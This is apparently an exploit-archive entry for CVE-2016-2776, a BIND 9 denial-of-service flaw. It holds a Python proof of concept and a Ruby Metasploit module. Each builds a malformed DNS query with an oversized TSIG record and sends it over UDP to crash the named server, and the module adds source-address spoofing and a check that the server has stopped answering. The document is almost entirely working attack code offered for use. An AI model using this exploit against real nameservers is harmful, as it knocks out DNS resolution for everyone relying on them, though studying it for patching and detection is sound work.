BIND 9 DNS Server Denial Of Service

`import socket  
import struct  
  
TARGET = ('192.168.200.10', 53)  
  
Q_A = 1  
Q_TSIG = 250  
DNS_MESSAGE_HEADERLEN = 12  
  
  
def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):  
query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"  
  
sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1  
tsig_rr = build_tsig_rr(sweet_spot)  
  
return query_A + tsig_rr  
  
def int16(n):  
return struct.pack("!H", n)  
  
def build_tsig_rr(bind_demarshalled_size):  
signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"  
"\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")  
tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"  
  
necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)  
necessary_bytes += 2 + 2 # length fields  
  
# from sizeof(TSIG RR) bytes conforming the TSIG RR  
# bind9 uses sizeof(TSIG RR) - 16 to build its own  
sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)  
  
tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields  
tsig_data = algo_name + signature_data  
return tsig_hdr + int16(len(tsig_data)) + tsig_data  
  
def generate_padding(n):  
max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]  
buckets = [1] * len(max_per_bucket)  
  
min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte  
max_size = sum(max_per_bucket) + len(buckets) + 2  
  
if not(min_size <= n <= max_size):  
raise RuntimeException("unsupported amount of bytes")  
  
curr_idx, n = 0, n - min_size  
while n > 0:  
next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)  
buckets[curr_idx] = 1 + n - next_n  
n, curr_idx = next_n, curr_idx + 1  
  
n_padding = lambda amount: chr(amount) + "A" * amount  
stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"  
  
return stringify(buckets[:4]), stringify(buckets[4:])  
  
if __name__ == "__main__":  
bombita = build_bind_nuke()  
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
s.sendto(bombita, TARGET)  
s.close()  
  
'''  
##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'timeout'  
require 'socket'  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Capture  
include Msf::Auxiliary::UDPScanner  
include Msf::Auxiliary::Dos  
include Msf::Auxiliary::Report  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'BIND 9 DoS CVE-2016-2776',  
'Description' => %q{  
Denial of Service Bind 9 DNS Server CVE-2016-2776.  
Critical error condition which can occur when a nameserver is constructing a response.  
A defect in the rendering of messages into packets can cause named to exit with an  
assertion failure in buffer.c while constructing a response to a query that meets certain criteria.  
  
This assertion can be triggered even if the apparent source address isnt allowed  
to make queries.  
},  
# Research and Original PoC - msf module author  
'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2016-2776' ],  
[ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]  
],  
'DisclosureDate' => 'Sep 27 2016',  
'DefaultOptions' => {'ScannerRecvWindow' => 0}  
))  
  
register_options([  
Opt::RPORT(53),  
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])  
])  
  
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')  
end  
  
def check_server_status(ip, rport)  
res = ""  
sudp = UDPSocket.new  
sudp.send(valid_query, 0, ip, rport)  
begin  
Timeout.timeout(5) do  
res = sudp.recv(100)  
end  
rescue Timeout::Error  
end  
  
if(res.length==0)  
print_good("Exploit Success (Maybe, nameserver did not replied)")  
else  
print_error("Exploit Failed")  
end  
end  
  
def scan_host(ip)  
@flag_success = true  
print_status("Sending bombita (Specially crafted udp packet) to: "+ip)  
scanner_send(payload, ip, rport)  
check_server_status(ip, rport)  
end  
  
def get_domain  
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)  
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)  
get_domain = domain+org  
end  
  
def payload  
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65  
query += "\x00\x00" # Flags: 0x0000 Standard query  
query += "\x00\x01" # Questions: 1  
query += "\x00\x00" # Answer RRs: 0  
query += "\x00\x00" # Authority RRs: 0  
query += "\x00\x01" # Additional RRs: 1  
  
# Doman Name  
query += get_domain # Random DNS Name  
query += "\x00" # [End of name]  
query += "\x00\x01" # Type: A (Host Address) (1)  
query += "\x00\x01" # Class: IN (0x0001)  
  
# Aditional records. Name  
query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes  
query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)  
query += "\x00"  
  
query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)  
query += "\x00\xff" # Class: ANY (0x00ff)  
query += "\x00\x00\x00\x00" # Time to live: 0  
query += "\x00\xfc" # Data length: 252  
  
# Algorithm Name  
query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes  
query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes  
query += "\x00"  
  
# Rest of TSIG  
query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART  
query += "\x01\x2c" # Fudge: 300  
query += "\x00\x10" # MAC Size: 16  
query += Rex::Text.rand_text_alphanumeric(16) # MAC  
query += "\x8f\x65" # Original Id: 36709  
query += "\x00\x00" # Error: No error (0)  
query += "\x00\x00" # Other len: 0  
end  
  
def valid_query  
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65  
query += "\x00\x00" # Flags: 0x0000 Standard query  
query += "\x00\x01" # Questions: 1  
query += "\x00\x00" # Answer RRs: 0  
query += "\x00\x00" # Authority RRs: 0  
query += "\x00\x00" # Additional RRs: 0  
  
# Doman Name  
query += get_domain # Random DNS Name  
query += "\x00" # [End of name]  
query += "\x00\x01" # Type: A (Host Address) (1)  
query += "\x00\x01" # Class: IN (0x0001)s  
end  
  
end  
`